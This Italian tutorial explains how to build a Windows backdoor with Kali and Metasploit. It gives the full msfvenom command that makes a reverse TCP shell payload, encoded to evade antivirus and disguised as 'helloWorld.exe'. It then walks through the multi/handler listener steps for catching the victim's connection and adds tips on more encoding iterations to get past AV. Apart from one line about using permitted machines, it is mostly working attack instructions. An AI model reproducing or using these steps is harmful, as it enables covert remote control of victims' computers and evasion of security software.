Una backdoor viene utilizzata per aggirare i meccanismi di sicurezza, spesso segretamente e per lo più non rilevabili. Usando MSFvenom, la combinazione di msfpayload e msfencode, è possibile creare una backdoor che si riconnette all'attaccante utilizzando il TCP della shell inversa. Per sviluppare una backdoor, devi cambiare la firma del tuo malware per eludere qualsiasi software antivirus. Completa questo progetto su un paio di computer a cui hai il permesso di accedere e, nel processo, imparerai di più sulla sicurezza informatica e su come funziona questo tipo di backdoor.
Passi
Passaggio 1. Avvia Kali e accendi la console del terminale
Passaggio 2. Digitare ifconfig per visualizzare l'interfaccia e controllare il proprio indirizzo IP
Passaggio 3. Digitare msfvenom -l encoders per visualizzare l'elenco degli encoder
Utilizzerai x86/shikata_ga_nai come codificatore
Passaggio 4. Digita "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
- -a x86 --platform windows indica l'architettura da usare.
- -p windows/shell/reverse_tcp indica i payload da incorporare.
- LHOST designa l'indirizzo IP del listener.
- LPORT designa la porta del listener.
- -b "\x00" designa per evitare caratteri non validi (byte nulli).
- -e x86/shikata_ga_nai designa il nome dell'encoder.
- -f exe > helloWorld.exe indica l'output del formato.
Passaggio 5. Digitare msfconsole per attivare Metasploit
Ora hai generato la tua backdoor. Quando la vittima fa clic su helloWorld.exe, il payload della shell incorporato verrà attivato e si ricollega al sistema. Per ricevere la connessione, devi aprire il multi-handler in Metasploit e impostare i payload
Passaggio 6. Digitare use exploit/multi/handler
Passaggio 7. Digitare set payload windows/shell/reverse_tcp
Passaggio 8. Digitare show options per controllare il modulo
Passaggio 9. Digitare set LHOST 192.168.48.129
"LHOST" designa l'indirizzo IP del listener
Passaggio 10. Digitare set LPORT 4444
"LPORT" designa la porta del listener
Passaggio 11. Digitare run e attendere la connessione dal computer della vittima
Passaggio 12. Attendi che la vittima faccia clic su helloWorld.exe
Quindi sarai connesso con successo alla macchina della vittima.
Suggerimenti
- L'uso di -i in MSFvenom rappresenterà le iterazioni della codifica. A volte più iterazioni possono aiutare a eludere il software AV.
- Hai imparato come generare e codificare la backdoor usando MSFvenom, ma questo metodo non funzionerà perfettamente con alcuni dei software AV al giorno d'oggi. Il motivo di ciò è dovuto ai modelli di esecuzione in MSFvenom. I fornitori di AV hanno aggiunto la firma statica di questi modelli e li cercano. La soluzione a questo problema consiste nell'utilizzare un modello di esecuzione diverso o strumenti diversi.